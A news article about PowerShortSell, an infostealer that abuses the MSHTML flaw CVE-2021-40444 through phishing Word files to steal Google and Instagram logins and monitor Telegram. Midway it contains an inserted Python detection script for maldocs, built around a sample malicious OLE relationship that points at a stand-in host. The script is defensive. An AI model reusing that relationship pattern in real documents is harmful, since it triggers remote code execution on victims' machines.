This old Internet Explorer bug is being used to steal Google, Instagram logins

It also monitors Telegram chats, experts warn


A new infostealer is making rounds on the web, grabbing Google and Instagram credentials and monitoring the victims’ Telegram correspondence, cyber-researchers are saying.

As reported by Bleeping Computer, security researchers from SafeBreach Labs have recently discovered a new Iranian threat actor, who’s been targeting the Farsi-speaking community all over the world with the new malware.

The malware is a PowerShell-based stealer called PowerShortSell. It exploits a Microsoft MSHTML remote code execution (RCE) bug, tracked as CVE-2021-40444. To infect a device, the attacker first needs to carry out a spear-phishing attack, sending a Microsoft Word attachment which, when the malicious file is opened, downloads and executes a DLL.

Once the downloaded DLL launches PowerShortSell, the malware starts collecting data, stealing passwords, taking screenshots, and sending all of the data to the attacker’s command-and-control server.
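As an added defender-side illustration (not code from the article, from SafeBreach or from Bleeping Computer), the Python below scans a .docx package for the relationship pattern that CVE-2021-40444 maldocs are known to carry: an external OLE-object relationship whose target chains the mhtml: and x-usc: schemes so that MSHTML fetches remote content when the document is opened. The two sample documents and the example.com host are constructed for the demonstration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace of every OOXML package-relationship (.rels) part.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# CVE-2021-40444 maldocs use an external oleObject relationship whose target
# chains mhtml: and x-usc: so that MSHTML fetches a remote HTML payload.
SUSPICIOUS_TARGET = re.compile(r"^mhtml:|!x-usc:", re.IGNORECASE)

def external_relationships(docx_bytes):
    """Yield (part, type, target) for every TargetMode="External" relationship."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    yield name, rel.get("Type", ""), rel.get("Target", "")

def scan_docx(docx_bytes):
    """Return findings for external OLE-object relationships with mhtml:/x-usc: targets."""
    findings = []
    for part, rtype, target in external_relationships(docx_bytes):
        if rtype.endswith("/oleObject") and SUSPICIOUS_TARGET.search(target):
            findings.append({"part": part, "target": target})
    return findings

def build_sample_docx(rels_xml):
    """Build a minimal docx-like zip around one rels part (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
_HDR = '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
# Constructed samples; example.com stands in for any real host.
BENIGN_RELS = (_HDR + '<Relationship Id="rId1" Type="' + _R + 'hyperlink" '
               'Target="https://example.com/" TargetMode="External"/></Relationships>')
MALDOC_RELS = (_HDR + '<Relationship Id="rId5" Type="' + _R + 'oleObject" '
               'Target="mhtml:http://example.com/page.html!x-usc:http://example.com/page.html" '
               'TargetMode="External"/></Relationships>')
if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("maldoc", MALDOC_RELS)):
        print(label, scan_docx(build_sample_docx(rels)))
```

The scan only inspects package relationships, so it is a cheap first-pass triage for mail gateways or sandboxes, not a substitute for patching MSHTML.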

Targeting enemies of the establishment


According to Tomer Bar, Director of Security Research at SafeBreach Labs, the targets seem to be “Iranians who live abroad and might be seen as a threat to Iran’s Islamic regime”. Bar came to this conclusion after analyzing the contents of the Word document sent out in the phishing attack, in which Iran’s leaders are blamed for a “Corona massacre”.

“The adversary might be tied to Iran’s Islamic regime since the Telegram surveillance usage is typical of Iran’s threat actors like Infy, Ferocious Kitten, and Rampant Kitten,” he added.

Almost half of all of the victims (45.8%) live in the United States, with the remainder being in The Netherlands (12.5%), Russia, Germany, and Canada (8.3%).


The CVE-2021-40444 RCE bug, which affects Internet Explorer’s MSHTML rendering engine, was patched in mid-September this year. It had first been spotted in the wild three weeks earlier, and the Iranian group was not the only one to abuse the vulnerability.

In fact, threat actors were sharing tutorials and proof-of-concepts on hacking forums long before Microsoft managed to patch it, according to Bleeping Computer.


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
